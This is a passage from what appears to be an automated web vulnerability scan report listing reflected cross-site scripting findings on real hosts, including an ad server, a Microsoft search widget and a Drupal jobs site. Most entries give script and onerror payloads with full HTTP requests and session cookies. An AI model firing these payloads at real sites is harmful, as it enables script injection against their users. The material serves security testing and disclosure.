The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15372"><script>alert(1)</script>519552992e4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/178596015372"><script>alert(1)</script>519552992e4/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4983"><script>alert(1)</script>a5233a774cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785960/0a4983"><script>alert(1)</script>a5233a774cb/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56715"><script>alert(1)</script>1b3cc5afd7e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785960/0/22556715"><script>alert(1)</script>1b3cc5afd7e/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2215b"><script>alert(1)</script>9c7a1b47bba was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785960/0/225/ADTECH2215b"><script>alert(1)</script>9c7a1b47bba;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
3.20. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.intergi.com
Path: /adiframe/3.0/5205/1785960/0/225/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec250"><script>alert(1)</script>e520c05f978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]&ec250"><script>alert(1)</script>e520c05f978=1 HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 374
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b937a><script>alert(1)</script>900b161fd17 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785960/0/225/ADTECH;target=b937a><script>alert(1)</script>900b161fd17 HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 270
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24df1"><script>alert(1)</script>1376414e666 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]24df1"><script>alert(1)</script>1376414e666 HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
3.23. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://i2.services.social.microsoft.com
Path: /search/Widgets/SearchBox.jss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6945e<img%20src%3da%20onerror%3dalert(1)>d02588c1036 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6945e<img src=a onerror=alert(1)>d02588c1036 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d636"><img%20src%3da%20onerror%3dalert(1)>cd559f46f5d was submitted in the REST URL parameter 1. This input was echoed as 4d636"><img src=a onerror=alert(1)>cd559f46f5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2936"><img%20src%3da%20onerror%3dalert(1)>c561c14c380 was submitted in the REST URL parameter 1. This input was echoed as a2936"><img src=a onerror=alert(1)>c561c14c380 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /jobsa2936"><img%20src%3da%20onerror%3dalert(1)>c561c14c380/ HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db47"><img%20src%3da%20onerror%3dalert(1)>44ae54b8308 was submitted in the REST URL parameter 1. This input was echoed as 6db47"><img src=a onerror=alert(1)>44ae54b8308 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /misc6db47"><img%20src%3da%20onerror%3dalert(1)>44ae54b8308/drupal.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4212b"><img%20src%3da%20onerror%3dalert(1)>a9b9e94b7d6 was submitted in the REST URL parameter 2. This input was echoed as 4212b"><img src=a onerror=alert(1)>a9b9e94b7d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /misc/drupal.js4212b"><img%20src%3da%20onerror%3dalert(1)>a9b9e94b7d6?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40742"><img%20src%3da%20onerror%3dalert(1)>31ba6936dc0 was submitted in the REST URL parameter 1. This input was echoed as 40742"><img src=a onerror=alert(1)>31ba6936dc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /misc40742"><img%20src%3da%20onerror%3dalert(1)>31ba6936dc0/jquery.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f59a7"><img%20src%3da%20onerror%3dalert(1)>a304b595f21 was submitted in the REST URL parameter 2. This input was echoed as f59a7"><img src=a onerror=alert(1)>a304b595f21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /misc/jquery.jsf59a7"><img%20src%3da%20onerror%3dalert(1)>a304b595f21?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2215b"><img%20src%3da%20onerror%3dalert(1)>082ddcb195 was submitted in the REST URL parameter 1. This input was echoed as 2215b"><img src=a onerror=alert(1)>082ddcb195 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules2215b"><img%20src%3da%20onerror%3dalert(1)>082ddcb195/node/node.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6084"><img%20src%3da%20onerror%3dalert(1)>79d8aaa6a1b was submitted in the REST URL parameter 2. This input was echoed as c6084"><img src=a onerror=alert(1)>79d8aaa6a1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/nodec6084"><img%20src%3da%20onerror%3dalert(1)>79d8aaa6a1b/node.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36cfd"><img%20src%3da%20onerror%3dalert(1)>0112b661d83 was submitted in the REST URL parameter 3. This input was echoed as 36cfd"><img src=a onerror=alert(1)>0112b661d83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/node/node.css36cfd"><img%20src%3da%20onerror%3dalert(1)>0112b661d83?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2480"><img%20src%3da%20onerror%3dalert(1)>6e90a398a07 was submitted in the REST URL parameter 1. This input was echoed as c2480"><img src=a onerror=alert(1)>6e90a398a07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modulesc2480"><img%20src%3da%20onerror%3dalert(1)>6e90a398a07/system/defaults.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b1b0"><img%20src%3da%20onerror%3dalert(1)>5dcfcce2e62 was submitted in the REST URL parameter 2. This input was echoed as 6b1b0"><img src=a onerror=alert(1)>5dcfcce2e62 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/system6b1b0"><img%20src%3da%20onerror%3dalert(1)>5dcfcce2e62/defaults.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2fe"><img%20src%3da%20onerror%3dalert(1)>e5a5118278f was submitted in the REST URL parameter 3. This input was echoed as bb2fe"><img src=a onerror=alert(1)>e5a5118278f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/system/defaults.cssbb2fe"><img%20src%3da%20onerror%3dalert(1)>e5a5118278f?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beda8"><img%20src%3da%20onerror%3dalert(1)>6e4c1ce2860 was submitted in the REST URL parameter 1. This input was echoed as beda8"><img src=a onerror=alert(1)>6e4c1ce2860 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modulesbeda8"><img%20src%3da%20onerror%3dalert(1)>6e4c1ce2860/system/system-menus.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93062"><img%20src%3da%20onerror%3dalert(1)>1f99fd27bf was submitted in the REST URL parameter 2. This input was echoed as 93062"><img src=a onerror=alert(1)>1f99fd27bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/system93062"><img%20src%3da%20onerror%3dalert(1)>1f99fd27bf/system-menus.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91038"><img%20src%3da%20onerror%3dalert(1)>24b23078d8b was submitted in the REST URL parameter 3. This input was echoed as 91038"><img src=a onerror=alert(1)>24b23078d8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/system/system-menus.css91038"><img%20src%3da%20onerror%3dalert(1)>24b23078d8b?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a02d"><img%20src%3da%20onerror%3dalert(1)>ae1a910df3b was submitted in the REST URL parameter 1. This input was echoed as 1a02d"><img src=a onerror=alert(1)>ae1a910df3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules1a02d"><img%20src%3da%20onerror%3dalert(1)>ae1a910df3b/system/system.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41960"><img%20src%3da%20onerror%3dalert(1)>bb9a86cebe9 was submitted in the REST URL parameter 2. This input was echoed as 41960"><img src=a onerror=alert(1)>bb9a86cebe9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/system41960"><img%20src%3da%20onerror%3dalert(1)>bb9a86cebe9/system.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae674"><img%20src%3da%20onerror%3dalert(1)>1a80ccbe22f was submitted in the REST URL parameter 3. This input was echoed as ae674"><img src=a onerror=alert(1)>1a80ccbe22f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/system/system.cssae674"><img%20src%3da%20onerror%3dalert(1)>1a80ccbe22f?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56d7"><img%20src%3da%20onerror%3dalert(1)>18564c695ef was submitted in the REST URL parameter 1. This input was echoed as f56d7"><img src=a onerror=alert(1)>18564c695ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
